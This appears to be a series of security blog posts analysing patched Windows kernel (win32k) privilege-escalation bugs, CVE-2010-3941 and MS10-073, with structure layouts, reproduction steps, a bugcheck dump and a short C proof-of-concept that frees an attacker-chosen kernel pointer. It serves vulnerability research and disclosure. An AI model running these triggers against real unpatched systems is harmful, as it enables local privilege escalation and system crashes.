.text:BF93AA01    jz      short loc_BF93AA11
.text:BF93AA03    mov     esi, [ebp+pDrawItemStruct]		// client stack
.text:BF93AA06    push    [esi+tagDRAWITEMSTRUCT.hDC]
.text:BF93AA09    call    __ReleaseDC@4   ; _ReleaseDC(x)
.text:BF93AA0E    mov     [esi+tagDRAWITEMSTRUCT.hDC], edi	// restore hDC
.text:BF93AA11    mov     eax, [ebp+var_2C]
.text:BF93AA14    jmp     short loc_BF93AA4C
.text:BF93AA16    xor     eax, eax
.text:BF93AA18    inc     eax
.text:BF93AA19    retn

References

  1. Edgar Barbosa – Windows Vista UIPI
  2. mxatone – Analyzing local privilege escalations in win32k
  3. http://msdn.microsoft.com/en-us/library/ms644927(v=vs.85).aspx

Kernel Pool Exploitation on Windows 7

As some of you already may have noticed, I’ll be speaking at Black Hat DC this year. The talk is titled Kernel Pool Exploitation on Windows 7 and covers the inner workings of the Windows 7 kernel pool (data structures, algorithms, etc.) and its susceptability to exploitation in face of pool corruption vulnerabilities. As we all know, kernel pool exploitation became measurably more difficult on Windows 7 due to safe unlinking. If you’re interested in kernel/driver vulnerabilities and their exploitability, you should definitely stop by January 19th and follow me (@kernelpool) on Twitter :-) The presentation abstract is as follows.

In Windows 7, Microsoft introduced safe unlinking to the kernel pool to address the growing number of vulnerabilities affecting the Windows kernel. Prior to removing an entry from a doubly-linked list, safe unlinking aims to detect memory corruption by validating the pointers to adjacent list entries. Hence, an attacker cannot easily leverage generic “write 4″ techniques in exploiting pool overflows or other pool corruption vulnerabilities. In this talk, we show that in spite of the efforts made to remove generic exploit vectors, Windows 7 is still susceptible to generic kernel pool attacks. In particular, we show that the pool allocator may under certain conditions fail to safely unlink free list entries, thus allowing an attacker to corrupt arbitrary memory. In order to thwart the presented attacks, we conclusively propose ways to further harden and enhance the security of the kernel pool.

Update (2011-02-04): The slides and whitepaper have been made available for download here.

CVE-2010-3941: Windows VDM Task Initialization Vulnerability

In MS10-098, Microsoft patched multiple vulnerabilities reported in win32k.sys that could be leveraged by a non-privileged user to gain elevated rights on a vulnerable system. One of the vulnerabilities affected the win32k component of the WOW32 subsystem, which plays an integral role in managing and scheduling tasks (i.e. Win16 applications) in the Virtual DOS Machine (VDM). As VDM bugs historically have been of interest [1][2] to the security community, I wanted to spend some time explaining the details of this particular vulnerability.

WOW Subsystem

MS-DOS and 16-bit Windows applications are not natively supported by their own environment subsystems running in separate user-mode processes. Instead, they are supported by Virtual DOS Machines (VDM) that provide an execution environment that resembles native MS-DOS. The lowest 16Mb of the VDM uses 16-bit segmented addressing to access memory, and contains MS-DOS emulation code as well as MS-DOS applications. The upper areas of the VDM use 32-bit addressing, and are used to provide Win32 and Windows NT executive services normally provided by MS-DOS itself.

The VDM used to run Win16 applications contain an extra layer of software called the Win16 on Win32 (WOW) layer. When an application calls a Win16 function, the WOW layer intercepts the call and passes control to the equivalent Win32 function. A single VDM is shared by all Win16 applications to emulate the native Windows 3.1 environment in which all applications share the same address space.  This also allows the WOW layer to mimic the non-preemptive multitasking environment expected by Win16 applications. Although each Win16 application is granted its own thread, the WOW layer ensures that only one Win16 application’s thread is active at any given time. [3]

WOW Structures

In order to properly emulate the Windows 3.1 execution environment, threads and processes define their own dedicated WOW kernel structures. When starting a new Win16 application, CSRSS invokes the NtUserNotifyProcessCreate system call to create a WOW per thread information structure (win32k!tagWOWTHREADINFO) for the new task.

typedef struct _tagWOWTHREADINFO        // 5 elements, 0x14 bytes (sizeof)
{
/*0x000*/     struct _tagWOWTHREADINFO* pwtiNext;
/*0x004*/     ULONG32      idTask;
/*0x008*/     ULONG32      idWaitObject;
/*0x00C*/     ULONG32      idParentProcess;
/*0x010*/     struct _KEVENT* pIdleEvent;
} tagWOWTHREADINFO, *PtagWOWTHREADINFO;

Notably, the WOWTHREADINFO structure defines a pointer to the idle event object (pIdleEvent), used in WOW task synchronization, as well as a unique id (idTask) specific to each task in a VDM. The task id is also stored at offset 0×18 in an undocumented thread data structure pointed to by NtCurrentTeb()->WOW32Reserved. As the WOWTHREADINFO structure is created upon process creation, it is actually initialized before the thread object itself is set up.

When a VDM first starts up and is initialized in WOW32!W32Init, it additionally calls WOW32!WK32InitializeHungAppSupport to allocate and initialize a per process WOW information structure (win32k!tagWOWPROCESSINFO).

typedef struct _tagWOWPROCESSINFO          // 10 elements, 0x28 bytes (sizeof)
{
/*0x000*/     struct _tagWOWPROCESSINFO* pwpiNext;
/*0x004*/     struct _tagTHREADINFO* ptiScheduled;
/*0x008*/     struct _tagTDB* ptdbHead;
/*0x00C*/     VOID*        lpfnWowExitTask;
/*0x010*/     struct _KEVENT* pEventWowExec;
/*0x014*/     VOID*        hEventWowExecClient;
/*0x018*/     ULONG32      nSendLock;
/*0x01C*/     ULONG32      nRecvLock;
/*0x020*/     struct _tagTHREADINFO* CSOwningThread;
/*0x024*/     LONG32       CSLockCount;
} tagWOWPROCESSINFO, *PtagWOWPROCESSINFO;

The WOWPROCESSINFO structure is global to all tasks running in a VDM in the same way that a PROCESSINFO structure is global to all GUI threads running in a process. It holds information such as the currently scheduled task (ptiScheduled) and the list of WOW tasks (ptdbHead), sorted by priority. Each entry in the task list is represented by a task data block structure (win32k!tagTDB), shown below.

typedef struct _tagTDB              // 7 elements, 0x18 bytes (sizeof)
{
/*0x000*/     struct _tagTDB* ptdbNext;
/*0x004*/     INT32        nEvents;
/*0x008*/     INT32        nPriority;
/*0x00C*/     struct _tagTHREADINFO* pti;
/*0x010*/     struct _tagWOWTHREADINFO* pwti;
/*0x014*/     UINT16       hTaskWow;
/*0x016*/     UINT16       TDB_Flags;
} tagTDB, *PtagTDB;

The TDB is created in NtUserInitTask when a VDM calls WOW32!WK32WOWInitTask to initialize a new task. It sets the task priority (nPriority) and links the task to the WOW per-thread information structure (pwti), as well as the regular per-thread information structure (pti). The task data block structure also keeps track of pending events (nEvents), used when scheduling tasks within a VDM.

Relationships between WOW kernel structures

Task Initialization Vulnerability

In initializing a new task via NtUserInitTask within the context of a shared VDM, zzzInitTask attempts to associate the already created WOWTHREADINFO structure with the task data block structure of the new task. However, the function fails to check if the specified task id (provided in the eighth argument to NtUserInitTask) has already been initialized. Thus, in initializing a task with an id of an already initialized task, the WOW per-thread information structure is assigned to a second task. Consequently, destroying either task referencing this particular structure would cause the other task to reference freed memory. When in turn the other task is destroyed, a double free occurs. As an attacker could easily reallocate the freed memory after having destroyed the first task, the vulnerability could be leveraged to escalate privileges (e.g. by freeing an in-use object or by exploiting the kernel pool).

In short, the following steps can be taken to reproduce the vulnerability.

  1. Start a 16-bit Windows application
  2. Enumerate the task ids of NTVDM’s threads by inspecting TEB->WOW32Reserved
  3. Call NtUserInitTask from the NTVDM process and specify the task id of an existing task/thread
  4. Terminate the process

A bugcheck such as the one below should be triggered.

*******************************************************************************
*                                                                             *
*                        Bugcheck Analysis                                    *
*                                                                             *
*******************************************************************************

BAD_POOL_CALLER (c2)
The current thread is making a bad pool request.  Typically this is at a bad IRQL level or double freeing the same allocation, etc.
Arguments:
Arg1: 00000007, Attempt to free pool which was already freed
Arg2: 00001097, (reserved)
Arg3: 5a040063, Memory contents of the pool block
Arg4: ffa9e320, Address of the block of pool being deallocated

Debugging Details:
------------------

POOL_ADDRESS:  ffa9e320 Paged session pool

FREED_POOL_TAG:  Uswt

BUGCHECK_STR:  0xc2_7_Uswt

DEFAULT_BUCKET_ID:  VISTA_DRIVER_FAULT

PROCESS_NAME:  ntvdm.exe

CURRENT_IRQL:  2

LAST_CONTROL_TRANSFER:  from 828e9e71 to 82878394

STACK_TEXT:
96877734 828e9e71 00000003 73526f7a 00000065 nt!RtlpBreakWithStatusInstruction
96877784 828ea96d 00000003 ffa9e318 000001ff nt!KiBugCheckDebugBreak+0x1c
96877b48 8292c1b6 000000c2 00000007 00001097 nt!KeBugCheck2+0x68b
96877bc4 92e7db18 ffa9e320 00000000 00000000 nt!ExFreePoolWithTag+0x1b1
96877be0 92defd09 ffa98a08 fe59fdd8 04751a78 win32k!DestroyTask+0xa1
96877c30 92decf87 895e6158 895e6158 00000000 win32k!xxxDestroyThreadInfo+0x5b5
96877c44 92deeaa6 895e6158 00000001 895e6158 win32k!UserThreadCallout+0x77
96877c60 82a55af4 895e6158 00000001 73526422 win32k!W32pThreadCallout+0x3a
96877cdc 82a8350e 00000000 00000000 895e6158 nt!PspExitThread+0x455
96877cfc 82a81958 895e6158 00000000 00000001 nt!PspTerminateThreadByPointer+0x61
96877d24 8285042a 00000000 00000000 0287f2ac nt!NtTerminateThread+0x74
96877d24 77a564f4 00000000 00000000 0287f2ac nt!KiFastCallEntry+0x12a
0287f290 77a55d2c 77a40892 00000000 00000000 ntdll!KiFastSystemCallRet
0287f294 77a40892 00000000 00000000 0287f364 ntdll!NtTerminateThread+0xc
0287f2ac 0e08d2d8 00000000 0287f308 6f1bb442 ntdll!RtlExitUserThread+0x39
0287f2b8 6f1bb442 00000000 6f1a718d e68f4f42 ntvdm!host_ExitThread+0x13
0287f2c0 6f1a718d e68f4f42 00000200 010ec288 WOW32!WK32WOWKillTask+0x28
0287f308 0e0a23ad 0e0a32ce 80000000 00002bf4 WOW32!W32Dispatch+0xb4
0287f30c 0e0a32ce 80000000 00002bf4 00000000 ntvdm!EventVdmBop+0x29
0287f324 6f1bb3d7 16c729e8 6f1badc6 010e0f10 ntvdm!cpu_simulate+0x186
0287fb74 0e08d29d 16c729e8 e53c55e4 00000000 WOW32!W32Thread+0x611
0287fbb4 77211174 010e0f10 0287fc00 77a6b3f5 ntvdm!ThreadStartupRoutine+0x2c
0287fbc0 77a6b3f5 010e0f10 7528fc69 00000000 kernel32!BaseThreadInitThunk+0xe
0287fc00 77a6b3c8 0e08d271 010e0f10 00000000 ntdll!__RtlUserThreadStart+0x70
0287fc18 00000000 0e08d271 010e0f10 00000000 ntdll!_RtlUserThreadStart+0x1b

STACK_COMMAND:  kb

FOLLOWUP_IP:
win32k!DestroyTask+a1
92e7db18 a1fcc1f392      mov     eax,dword ptr [win32k!gpsi (92f3c1fc)]

SYMBOL_STACK_INDEX:  4

SYMBOL_NAME:  win32k!DestroyTask+a1

FOLLOWUP_NAME:  MachineOwner

MODULE_NAME: win32k

IMAGE_NAME:  win32k.sys

DEBUG_FLR_IMAGE_TIMESTAMP:  4a5bc2a2

FAILURE_BUCKET_ID:  0xc2_7_Uswt_win32k!DestroyTask+a1

BUCKET_ID:  0xc2_7_Uswt_win32k!DestroyTask+a1

Followup: MachineOwner
---------

References

  1. Microsoft Windows NT #GP Trap Handler Allows Users to Switch Kernel Stack
  2. Windows VDM Zero Page Race Condition Privilege Escalation
  3. http://technet.microsoft.com/en-us/library/cc767884.aspx

MS10-073: Windows Class Handling Gone Wrong

In MS10-073, Microsoft addressed a privilege escalation vulnerability (CVE-2010-2744) in windows class data handling, affecting all supported versions of Windows. In this blog post, we will examine the details of the vulnerability as well as the changes made by the patch. Note that this vulnerability differs from the EoP used by Stuxnet on XP/2000, also addressed in MS10-073.

Windows User Objects

Windows manages all user interface entities such as windows, menus, and cursors as objects. In fact, win32k has its own dedicated handle table for keeping track of all active user objects in a given session. One of the most important objects is undeniably the window object. On Windows 7, win32k.sys conveniently exports symbol information for the window object structure (win32k!tagWND), shown below.

typedef struct tagWND
{
/*0x000*/     struct _THRDESKHEAD head;
/*0x014*/     ULONG32      state;
/*0x018*/     ULONG32      state2;
/*0x01C*/     ULONG32      ExStyle;
/*0x020*/     ULONG32      style;
/*0x024*/     VOID*        hModule;
/*0x028*/     UINT16       hMod16;
/*0x02A*/     UINT16       fnid;
/*0x02C*/     struct _tagWND* spwndNext;
/*0x030*/     struct _tagWND* spwndPrev;
/*0x034*/     struct _tagWND* spwndParent;
/*0x038*/     struct _tagWND* spwndChild;
/*0x03C*/     struct _tagWND* spwndOwner;
/*0x040*/     struct _tagRECT rcWindow;
/*0x050*/     struct _tagRECT rcClient;
/*0x060*/     PVOID lpfnWndProc;
/*0x064*/     struct _tagCLS* pcls;
/*0x068*/     struct _HRGN__* hrgnUpdate;
/*0x06C*/     struct _tagPROPLIST* ppropList;
/*0x070*/     struct _tagSBINFO* pSBInfo;
/*0x074*/     struct _tagMENU* spmenuSys;
/*0x078*/     struct _tagMENU* spmenu;
/*0x07C*/     struct _HRGN__* hrgnClip;
/*0x080*/     struct _HRGN__* hrgnNewFrame;
/*0x084*/     struct _LARGE_UNICODE_STRING strName;
/*0x090*/     INT32        cbwndExtra;
/*0x094*/     struct _tagWND* spwndLastActive;
/*0x098*/     struct _HIMC__* hImc;
/*0x09C*/     ULONG32      dwUserData;
/*0x0A0*/     struct _ACTIVATION_CONTEXT* pActCtx;
/*0x0A4*/     struct _D3DMATRIX* pTransform;
/*0x0A8*/     struct _tagWND* spwndClipboardListenerNext;
/*0x0AC*/     ULONG32      ExStyle2;
} WND, *PWND;

In our case, there are a few fields we want to pay closer attention to. The FNID, stored at offset 0x2A, is a constant defining the function identifier of the associated class. The FNID can be used to call any system class window procedure via NtUserMessageCall, and is also frequently used by Windows to determine if a system class window has been properly initialized (set to non-null). Also of interest is the class object pointer (pcls), stored at offset 0×64. The class defines common window attributes as well as the number of extra bytes reserved for each window (mirrored in cbwndExtra at offset 0×90). This data immediately follows a window object in memory and can be application defined or used by a system class window for class-specific data.

In order to update the extra data associated with each window, an application may call SetWindowLongPtr with nIndex set to a zero-based offset. As system class windows also store kernel pointers in the extra window memory, validation has to be performed before an operation is permitted. In particular, xxxSetWindowLong (called by NtUserSetWindowLong, for instance) checks the window FNID in order to prevent malicious attempts at updating data used by the kernel. The problem with this approach is that the FNID starts out as null, hence may allow an attacker to to pre-initialize extra data (e.g. via SetWindowsHookEx) before a system class window has been properly initialized. Although this normally shouldn’t be a problem, two system class procedures were found to incorrectly handle already initialized extra window data, leading to exploitable conditions.

Window Class Handling Vulnerabilities

The menu window system class procedure (xxxMenuWindowProc) is responsible for handling messages sent to menu windows. Upon receiving a WM_NCCREATE message, the menu window attempts to allocate and initialize a popup menu structure (win32k!tagPOPUPMENU), for which it stores a pointer in the extra window memory. However, if this pointer has already been initialized before the WM_NCCREATE message has been sent, the menu window procedure would use the existing pointer instead. As this pointer could have been set manually via SetWindowLongPtr (before the FNID is assigned), an attacker could fully control the popup menu structure, used in subsequent read and write operations. Moreover, destroying the window would result in the attacker controlled pointer being freed. The latter is demonstrated in the following test case.

#include <windows.h>

int main(int argc, char **argv)
{
	WNDCLASSA Class = {0};
	CREATESTRUCTA Cs = {0};
	FARPROC MenuWindowProcA;
	HMODULE hModule;
	HWND hWindow;

	Class.lpfnWndProc = DefWindowProc;
	Class.lpszClassName = "Class";
	Class.cbWndExtra = sizeof(PVOID);

	RegisterClassA(&Class);

	hModule = LoadLibraryA("USER32.DLL");

	MenuWindowProcA = GetProcAddress(hModule,"MenuWindowProcA");

	hWindow = CreateWindowA("Class","Window",0,0,0,32,32,NULL,NULL,NULL,NULL);

	// set the pointer value of the (soon to be) popup menu structure
	SetWindowLongPtr(hWindow,0,(LONG_PTR)0x80808080);

	// set WND->fnid = FNID_MENU
	MenuWindowProcA(hWindow,0,WM_NCCREATE,(WPARAM)0,(LPARAM)&Cs);

	// trigger -> ExPoolFree(0x80808080)
	DestroyWindow(hWindow);

	return 0;
}

The task switch window procedure (xxxSwitchWndProc) was found vulnerable to a similar error. In processing the WM_CREATE message, the procedure failed to validate the switch window information pointer that possibly could have been pre-initialized. Consequently, any further operations involving the use of this pointer could lead to an arbitrary read or write. This flaw only appeared to have exploitable impact on XP/2003, as Vista and later verifies the pointers (in win32k!RemoveSwitchWindowInfo) by traversing a linked list of all active SwitchWindowInfo structures (win32k!gpswiFirst).

The Patch

In order to address the vulnerabilities, changes were made to the SetWindowLong APIs as well as the system class procedures. Notably, several functions now perform additional validation on the associated window class (and not just the FNID) before attempting to update extra window data. Additionally, both xxxMenuWindowProc and xxxSwitchWndProc now ensure that the extra data is null before handling the window object (and updating the FNID). This is needed as the system class pointer in a window object is never actually updated upon “converting” to a system class in the test case above. Thus, the changes made to xxxSetWindowLong would not alone be sufficient to prevent pre-initialization of window system class data.